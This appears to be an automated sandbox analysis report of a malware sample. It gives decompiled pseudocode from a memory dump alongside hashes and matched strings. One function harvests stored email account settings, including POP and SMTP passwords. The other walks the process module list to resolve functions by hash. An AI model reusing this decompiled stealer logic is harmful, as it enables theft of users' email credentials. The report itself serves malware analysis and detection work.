                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 88%
                                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr _t40;
                                      				intOrPtr _t45;
                                      				intOrPtr _t47;
                                      				void* _t71;
                                      				void* _t75;
                                      				void* _t77;
                                      
                                      				_t72 = _a4;
                                      				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                                      				_t81 = _t71;
                                      				if(_t71 != 0) {
                                      					_push(__ebx);
                                      					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                                      					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                                      					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                                      					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                                      					_v8 = _v8 & 0x00000000;
                                      					_v20 = _t40;
                                      					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                                      					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                                      					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                                      					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                                      					_v12 = _v12 & 0x00000000;
                                      					_v32 = _t45;
                                      					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                                      					_t77 = _t75 + 0x50;
                                      					_v36 = _t47;
                                      					if(_v8 != 0 || _v12 != 0) {
                                      						E00405872( *0x49f934, _t71, 1, 0);
                                      						E00405872( *0x49f934, _t67, 1, 0);
                                      						_t74 = _v16;
                                      						E00405872( *0x49f934, _v16, 1, 0);
                                      						E00405781( *0x49f934, _v40);
                                      						E00405872( *0x49f934, _v20, 1, 0);
                                      						_push(_v8);
                                      						E00405762(_v16,  *0x49f934, _v24);
                                      						E00405872( *0x49f934, _v28, 1, 0);
                                      						E00405781( *0x49f934, _v44);
                                      						E00405872( *0x49f934, _v32, 1, 0);
                                      						_push(_v12);
                                      						E00405762(_t74,  *0x49f934, _v36);
                                      						_t77 = _t77 + 0x88;
                                      					} else {
                                      						_t74 = _v16;
                                      					}
                                      					E0040471C(_t71);
                                      					E0040471C(_t67);
                                      					E0040471C(_t74);
                                      					E0040471C(_v20);
                                      					E0040471C(_v24);
                                      					E0040471C(_v28);
                                      					E0040471C(_v32);
                                      					E0040471C(_v36);
                                      				}
                                      				return 1;
                                      			}






















                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                      • API String ID: 0-2111798378
                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 90%
                                      			E0040317B(intOrPtr _a4) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				void* __ecx;
                                      				intOrPtr _t17;
                                      				void* _t21;
                                      				intOrPtr* _t23;
                                      				void* _t26;
                                      				void* _t28;
                                      				intOrPtr* _t31;
                                      				void* _t33;
                                      				signed int _t34;
                                      
                                      				_push(_t25);
                                      				_t1 =  &_v8;
                                      				 *_t1 = _v8 & 0x00000000;
                                      				_t34 =  *_t1;
                                      				_v8 =  *[fs:0x30];
                                      				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                                      				_t31 = _t23;
                                      				do {
                                      					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                                      					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                                      					_pop(_t26);
                                      					_t35 = _t28;
                                      					if(_t28 == 0) {
                                      						goto L3;
                                      					} else {
                                      						E004032EA(_t35, _t28, 0);
                                      						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                                      						_t33 = _t33 + 0x14;
                                      						if(_a4 == _t21) {
                                      							_t17 = _v12;
                                      						} else {
                                      							goto L3;
                                      						}
                                      					}
                                      					L5:
                                      					return _t17;
                                      					L3:
                                      					_t31 =  *_t31;
                                      				} while (_t23 != _t31);
                                      				_t17 = 0;
                                      				goto L5;
                                      			}















                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                      Uniqueness

                                      Uniqueness Score: -1.00%